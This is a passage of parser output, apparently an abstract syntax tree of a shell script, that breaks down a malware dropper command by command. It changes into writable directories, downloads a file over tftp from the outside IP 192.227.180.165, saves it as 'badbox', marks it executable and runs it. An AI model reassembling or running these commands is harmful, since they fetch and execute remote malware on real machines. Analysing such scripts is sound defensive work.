    WordNode(lineno=15, pos=(1555, 1560), word='chmod'),
    WordNode(lineno=15, pos=(1561, 1563), word='+x'),
    WordNode(lineno=15, pos=(1564, 1565), word='*'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1565, 1566)),
  CommandNode(lineno=15, pos=(1566, 1574), parts=[
    WordNode(lineno=15, pos=(1566, 1574), word='./badbox'),
  ]),
])
ListNode(lineno=16, pos=(1575, 1716), parts=[
  CommandNode(lineno=16, pos=(1575, 1582), parts=[
    WordNode(lineno=16, pos=(1575, 1577), word='cd'),
    WordNode(lineno=16, pos=(1578, 1582), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1583, 1585)),
  CommandNode(lineno=16, pos=(1586, 1597), parts=[
    WordNode(lineno=16, pos=(1586, 1588), word='cd'),
    WordNode(lineno=16, pos=(1589, 1597), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1598, 1600)),
  CommandNode(lineno=16, pos=(1601, 1608), parts=[
    WordNode(lineno=16, pos=(1601, 1603), word='cd'),
    WordNode(lineno=16, pos=(1604, 1608), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1609, 1611)),
  CommandNode(lineno=16, pos=(1612, 1620), parts=[
    WordNode(lineno=16, pos=(1612, 1614), word='cd'),
    WordNode(lineno=16, pos=(1615, 1620), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1621, 1623)),
  CommandNode(lineno=16, pos=(1624, 1628), parts=[
    WordNode(lineno=16, pos=(1624, 1626), word='cd'),
    WordNode(lineno=16, pos=(1627, 1628), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1628, 1629)),
  CommandNode(lineno=16, pos=(1630, 1670), parts=[
    WordNode(lineno=16, pos=(1630, 1634), word='tftp'),
    WordNode(lineno=16, pos=(1635, 1637), word='-r'),
    WordNode(lineno=16, pos=(1638, 1651), word='dfjdjgfjdfjfd'),
    WordNode(lineno=16, pos=(1652, 1654), word='-g'),
    WordNode(lineno=16, pos=(1655, 1670), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1670, 1671)),
  CommandNode(lineno=16, pos=(1671, 1696), parts=[
    WordNode(lineno=16, pos=(1671, 1674), word='cat'),
    WordNode(lineno=16, pos=(1675, 1688), word='dfjdjgfjdfjfd'),
    RedirectNode(lineno=16, output=
      WordNode(lineno=16, pos=(1690, 1696), word='badbox'), pos=(1689, 1696), type='>'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1696, 1697)),
  CommandNode(lineno=16, pos=(1697, 1707), parts=[
    WordNode(lineno=16, pos=(1697, 1702), word='chmod'),
    WordNode(lineno=16, pos=(1703, 1705), word='+x'),
    WordNode(lineno=16, pos=(1706, 1707), word='*'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1707, 1708)),
  CommandNode(lineno=16, pos=(1708, 1716), parts=[
    WordNode(lineno=16, pos=(1708, 1716), word='./badbox'),
  ]),
])
